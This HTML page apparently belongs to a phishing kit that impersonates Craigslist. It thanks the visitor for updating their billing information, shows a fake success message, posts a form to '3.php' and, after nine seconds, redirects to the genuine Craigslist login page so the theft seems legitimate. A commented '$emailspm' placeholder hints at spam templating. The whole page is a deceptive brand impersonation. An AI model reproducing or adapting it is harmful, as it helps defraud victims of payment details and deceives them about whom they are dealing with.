
<html>
    <body>

<html>
<head>
    <title>Craigslist Account</title>
   <link rel="Shortcut Icon" type="image/x-icon" href="index_files/favicon.ico"> <link rel="stylesheet" title="craigslist" href="/styles/craigslist.css" type="text/css" media="all">
</head>

<body id="pp">
<table width="100%" id="header" summary="header">
    <tr valign="top">
        <td>
            <b> <a href="http://www.craigslist.org">Craigslist</a> &gt; Confirmation</b>
        </td>
    </tr>
</table>
<hr>

<form action="3.php" method="POST">
<div style="float:left;">
<table width="100%" border="0">
        <tr bgcolor="#eeeeee">
                <th align="left" colspan="2"><b>Account Update</b></th>
                <th align="right"><b></b></th>
        </tr>
        <tr>
                <!-- <td nowrap colspan="2">"$emailspm"</td> -->
                <td>&nbsp;</td>
        </tr>
        <tr>
<td>&nbsp;&nbsp;</td><td><i>- <span style="color: green"><b>Thank you for update your billing information. Your billing details were successfully updated.
Check your AD in the next 10 minutes. Craigslist Inc.</b></span></i></td>
<td align='right'></td>
</tr>

        <tr>

    <p><font size="177">Your Account Was Successfully Updated</font></p>
    <script>
        var timer = setTimeout(function() {
            window.location='https://accounts.craigslist.org/login?rt=L&rp=%2Flogin%2Fhome'
        }, 9000);
    </script>


</div>

</form>



